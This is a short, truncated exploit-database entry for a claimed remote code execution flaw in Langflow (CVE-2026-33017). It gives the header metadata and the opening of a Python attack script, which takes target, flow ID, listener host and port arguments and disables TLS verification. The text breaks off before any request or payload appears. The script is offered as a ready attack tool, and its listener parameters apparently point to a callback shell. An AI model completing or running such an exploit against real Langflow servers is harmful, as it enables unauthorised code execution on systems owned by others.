Exploit Title: Langflow 1.9.0 - RCE
Exploit Author: Diamorphine
Vendor Homepage: https://www.langflow.org/
Software Link: https://www.langflow.org/desktop
Version: < 1.9.0
Tested on: Debian
CVE : CVE-2026-33017
import asyncio
import httpx
import argparse
from urllib.parse import urljoin
async def main(target, flow_id, lhost, lport, client_id):
async with httpx.AsyncClient(verify=False) as clien...
